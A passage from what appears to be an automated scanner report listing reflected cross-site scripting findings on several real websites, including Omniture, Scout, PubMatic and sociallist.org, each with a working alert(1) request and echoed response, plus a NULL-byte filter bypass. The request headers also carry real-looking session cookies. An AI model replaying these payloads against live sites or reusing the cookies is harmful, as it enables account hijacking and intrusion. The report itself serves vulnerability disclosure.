tml%3Fa%3DMain.SSOHelp%26ebfe1%255C%2522-alert%25281%2529-%255C%252279f9f86c119%3D1","REQUEST_URI":"/p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132&ebfe1"-alert(1)-"79f9f86c119=1","OBERON_START_DATE":null,"jpj_old":"95253754444132"};
Omniture.Config.reportname = '';
Omniture.Config.page_id = '100000';
Omniture.Config.recent_date_range_js = null;
Omniture.Config.default_repor
...[SNIP]...

1.162. https://my.omniture.com/p/suite/1.2/index.html [ssSession parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.omniture.com
Path:   /p/suite/1.2/index.html

Issue detail

The value of the ssSession request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e86ee"-alert(1)-"66ebe3920b5 was submitted in the ssSession parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67e86ee"-alert(1)-"66ebe3920b5&jpj=95253754444132 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:31:44 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www460
Content-Type: text/html
Connection: close
Content-Length: 27586

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<!--[if I
...[SNIP]...
history_id":"20123132637709","excel":"","came_from":"%2Fp%2Fsuite%2F1.2%2Findex.html%3Fa%3DMain.SSOHelp","REQUEST_URI":"/p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67e86ee"-alert(1)-"66ebe3920b5&jpj=95253754444132","OBERON_START_DATE":null,"jpj_old":"95253754444132"};
Omniture.Config.reportname = '';
Omniture.Config.page_id = '100000';
Omniture.Config.recent_date_range_js = null;
Omniture.Con
...[SNIP]...

1.163. http://recruiting.scout.com/a.z [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00412f4'-alert(1)-'956e390f61d was submitted in the c parameter. This input was echoed as 412f4'-alert(1)-'956e390f61d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /a.z?s=73&p=9&c=4%00412f4'-alert(1)-'956e390f61d&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:41:39 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 427 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Wed, 02 Feb 2011 15:51:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212188

<!-- An exception occurred. Described as: Incorrect syntax near '412'.
The floating point value '956e390' is out of the range of computer representation (8 bytes).--><!DOCTYPE html
PUBLIC "-//
...[SNIP]...
<!--
function SeasonYearChange() {
document.location.href='/a.z?s=73&p=9&c=4%00412f4'-alert(1)-'956e390f61d&pid=88&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;}
//-->
...[SNIP]...

1.164. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21eb1'-alert(1)-'67613be4156 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011&21eb1'-alert(1)-'67613be4156=1 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:42:45 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 367 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Wed, 02 Feb 2011 15:52:44 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211233

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
<!--
function SeasonYearChange() {
document.location.href='/a.z?s=73&p=9&c=4&pid=88&21eb1'-alert(1)-'67613be4156=1&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;}
//-->
...[SNIP]...

1.165. http://showads.pubmatic.com/AdServer/AdServerServlet [frameName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showads.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46054'-alert(1)-'3516148de48 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame1262482626346054'-alert(1)-'3516148de48&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:21 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Fri, 04-Feb-2011 15:41:21 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:21 GMT; path=/
Set-Cookie: pubfreq_26263_21091_1452320870=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:21 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:21 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1565

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame1262482626346054'-alert(1)-'3516148de48" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=iGYAAJdmAABjUgAAAAAAAAAAAAAAAAAAAAAAAAAAAACtagAAzwAAAKAAAABYAgAAAAAAAAEAAAA0QUMzMkRCMC0wQjZBLTQ
...[SNIP]...

1.166. http://showads.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showads.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e7a8'-alert(1)-'8af0a80e42e was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent8e7a8'-alert(1)-'8af0a80e42e&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:18 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Fri, 04-Feb-2011 15:41:18 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:18 GMT; path=/
Set-Cookie: pubfreq_26263_21091_710083775=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:18 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:18 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1565

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
act=0.000000&kadNetFrequecy=1&kadwidth=160&kadheight=600&kltstamp=1296661278&indirectAdId=27309&adServerOptimizerId=1&ranreq=0.3423423212952912&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent8e7a8'-alert(1)-'8af0a80e42e">
...[SNIP]...

1.167. http://showads.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showads.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0ddb'-alert(1)-'75dd4dca154 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912b0ddb'-alert(1)-'75dd4dca154&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:21 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Fri, 04-Feb-2011 15:41:21 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:21 GMT; path=/
Set-Cookie: pubfreq_26263_21091_187138684=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:21 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:21 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1565

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
Id=26263&adId=21091&adServerId=207&kefact=1.100000&kpbmtpfact=0.000000&kadNetFrequecy=1&kadwidth=160&kadheight=600&kltstamp=1296661281&indirectAdId=27309&adServerOptimizerId=1&ranreq=0.3423423212952912b0ddb'-alert(1)-'75dd4dca154&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent">
...[SNIP]...

1.168. http://sociallist.org/submit.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sociallist.org
Path:   /submit.php

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5be"><script>alert(1)</script>51b0587d24d was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage">
...[SNIP]...

1.169. http://sociallist.org/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sociallist.org
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c92e7"><script>alert(1)</script>c161344b8ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1 HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 18868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1">
...[SNIP]...

1.170. http://sociallist.org/submit.php [tag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sociallist.org
Path:   /submit.php

Issue detail

The value of the tag request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94680"><script>alert(1)</script>385c4aafbf was submitted in the tag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage">
...[SNIP]...

1.171. http://sociallist.org/submit.php [text parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sociallist.org
Path:   /submit.php

Issue detail

The value of the text request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf26"><script>alert(1)</script>4d8458ad73a was submitted in the text parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a">
...[SNIP]...

1.172. http://sociallist.org/submit.php [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sociallist.org
Path:   /submit.php

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5df9"><script>alert(1)</script>6ca859d5791 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage">
...[SNIP]...

1.173. http://sociallist.org/submit.php [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sociallist.org
Path:   /submit.php

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae34"><script>alert(1)</script>c10119c2686 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage">
...[SNIP]...

1.174. http://sociallist.org/submit.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sociallist.org
Path:   /submit.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a978a"><script>alert(1)</script>2b441ed7164 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage">
